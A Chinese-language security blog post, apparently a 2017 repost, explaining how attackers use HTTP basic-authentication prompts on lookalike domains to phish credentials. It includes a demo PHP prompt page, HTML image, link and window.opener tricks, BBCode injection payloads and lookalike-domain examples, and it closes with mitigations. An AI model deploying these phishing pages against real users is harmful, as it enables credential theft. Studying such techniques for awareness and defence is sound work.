如何制作基础认证钓鱼页面?
在之前的一篇文章中,我介紹了一款非常受歡迎的工具——Responder,它是一款強大并且簡單易用的內網滲透神器。使用它的“基本身份驗證”提示來在Web瀏覽器中偶爾輸入無效域時竊取用戶憑據。
應該說,Responder的方法是相當不錯的,它在捕獲和響應當前域的DNS請求時非常給力。但是經過一段時間的研究,我認為基本身份驗證的方法如果被用于網絡釣魚,則攻擊效率更加突出。
我之所以最喜歡基本認證,就是因為從來沒有人知道誰在對你認證,認證在哪里結束。這種認證的混亂通常會使用戶陷入簡單的網絡釣魚攻擊,從而允許攻擊者輕松收集用戶登錄憑據。因為,一旦服務器知道了用戶的身份,就可以判定用戶可以訪問事務和資源了;通常通過用戶名和密碼。
用戶應該能夠基于2個安全指標來確定基本身份驗證請求是否是真實的:
1.請求身份驗證的實體的IP地址或域,不過,這通常不能幫助用戶進行判別,因為攻擊者也可以注冊類似于可信域的域名。例如,當嘗試盜取targetdomain.com的憑據時,攻擊者可以注冊類似的域:
targetdomain.co/.net target-domain.com targetdomain-oauth.com targetdomain-cdn.com targetdomain-images.com login-targetdomain.com2. ”realm”認證參數,不過這是一個可以由攻擊者提供的任意字符串。根據上下文,簡單的字符串可能會欺騙用戶,讓用戶認為基本的身份驗證提示是真實的:
網絡代理身份驗證要求; 長時間的沒有操作而退出登錄,如要再操作還需再次登錄。說了這么多理論,讓我舉幾個例子,其中基本的身份驗證提示可能真的讓用戶感到困惑。假設targetdomain.com是一個真正的網站,攻擊者可以簡單地注冊并控制target-domain.com,,一個可能會被一些用戶混淆的網站。
1.通過濫用HTML圖像標簽獲取基本身份驗證提示
如果攻擊者可以向網站添加HTML 圖像標簽,并引用攻擊者控制的域的圖像,則攻擊者可以在加載圖像之前強制執行基本驗證提示。以下有一個簡短的演示:
targetdomain.com/image.html是一個包含第三方網站圖片的網頁:target-domain.com。
<html><body>Just?a?funny?cat?image<img?src="http://target-domain.com/basicauth.php"?alt="Could?not?load?image?-?Invalid?credentils."/></body> </html>target-domain.com/basicauth.php是一個訪問后需要基本身份驗證的第三方頁面。
<?php?$valid_passwords?=?array?("security"?=>?"cafe"); $valid_users?=?array_keys($valid_passwords);$user?=?isset($_SERVER['PHP_AUTH_USER'])???$_SERVER['PHP_AUTH_USER']?:?""; $pass?=?isset($_SERVER['PHP_AUTH_PW'])?????$_SERVER['PHP_AUTH_PW']???:?"";$validated?=?(in_array($user,?$valid_users))?&&?($pass?==?$valid_passwords[$user]);if?(!$validated)?{header('WWW-Authenticate:?Basic?realm="Corporate?domain"');//header('HTTP/1.0?401?Unauthorized');die?("Not?authorized"); }//?If?the?user?enters?valid?credentials,?just?show?him?a?cat?pictureheader("Location:?https://kpmgsecurity.files.wordpress.com/2017/06/cat.jpg")?>因此,由第三方網站上托管的圖像生成基本驗證提示。可以肯定的是,在基本認證提示中輸入的任何憑據將被發送到第三方網站。目前,基本身份驗證提示只存在于Firefox和IE上,而Chrome不會顯示。
2.打開URL時獲取基本身份驗證提示
如果攻擊者可以將HTML錨點添加到網站,并添加到第三方網站的鏈接,則攻擊者可以向第三方網站添加基本身份驗證,并在導航發生之前提示用戶。
targetdomain.com/link.html是一個包含指向第三方網站的鏈接的頁面:
<html><body>A?cool?website?you?should?visit:?<a?href="http://target-domain.com/basicauth.php">Click?me!</a></body> </html>因此,當主機頁面和URL仍然顯示給用戶時,基本身份驗證提示將顯示在加載新URL之前。基本認證提示只在Firefox和IE中顯示,而Chrome會在顯示之前卸載主機頁面并更新地址欄。
3.在新選項卡中打開URL時獲取基本身份驗證提示
如果導航發生在新選項卡中,則基本身份驗證提示可以通過利用window.opener來顯示在初始選項卡中。
targetdomain.com/newtab.html是一個包含將在新標簽頁中打開的鏈接的頁面:
<html><body>Another?cool?website?you?should?visit:?<a?href="http://target-domain.com/landingpage.html"?target="_blank">Click?me!</a></body> </html>target-domain.com/landingpage.html是一個將使用者重定向到需要基本身份驗證網址的頁面:
<html><head><title>Nothing?here</title></head><body><script>window.opener.location="http://target-domain.com/basicauth.php";</script></body> </html>因此,當主機頁面和URL仍顯示給用戶時,基本身份驗證提示將顯示在加載新URL的選項卡中。基本認證提示只在Firefox和IE中顯示,而Chrome在卸載主機頁面并更新地址欄之后,才會顯示基本認證提示。
4.獲取Word文檔中的基本身份驗證提示
如果文檔包含引用第三方網站的圖像模板,則基本身份驗證提示可能會出現在Word文檔中。這樣的文件可以通過電子郵件或公共網站向受害者提供,這對攻擊者來說非常方便。此外,使用Phishery可以自動創建這樣的WORD文檔的過程。
以上只是我碰到的一些實例,其中基本認證提示以令人困惑的方式顯示給最終用戶。這些例子都是在實際生活中隨處可見,比如博客,論壇,協作平臺,電子學習平臺都有允許用戶添加定制內容的選項,包括圖像和鏈接。任何帶有文本編輯器的網站,允許bb代碼(或類似的標記)很容易受到這樣的網絡釣魚攻擊:
[img]http://target-domain.com/basicauth.php[/img] <img>http://target-domain.com/basicauth.php</img> [a]http://target-domain.com/basicauth.php[/a] [url]http://target-domain.com/basicauth.php[/url] ...?and?many?more?examples防止此類攻擊的兩個方法如下:
1.不允許用戶到你的網站去添加圖像和鏈接; 2.可以過濾不需要的基本身份驗證提示,將所有外部資源與本地URL進行封裝(類似于Facebook的URL封裝)。 雖然第一個建議可能會超出許多網站的安全防護目的,但第二個建議可能很難在定制平臺上實現和維護。如果你想在這個問題上有更多了解,試著調查一下移動設備上發生的身份驗證行為。出于可用性的考慮,移動瀏覽器在安全性方面做了很多妥協,比如,允許更換地址欄中的URL的頁面標題,顯示SSL證書的細節,幾乎不會查看當前頁面的源碼等。
原文發布時間為:2017年9月12日 本文作者:xiaohui? 本文來自云棲社區合作伙伴嘶吼,了解相關信息可以關注嘶吼網站。 原文鏈接
總結
以上是生活随笔為你收集整理的如何制作基础认证钓鱼页面?的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 如何实现定时开机
- 下一篇: Django之CSRF跨站请求伪造(老掉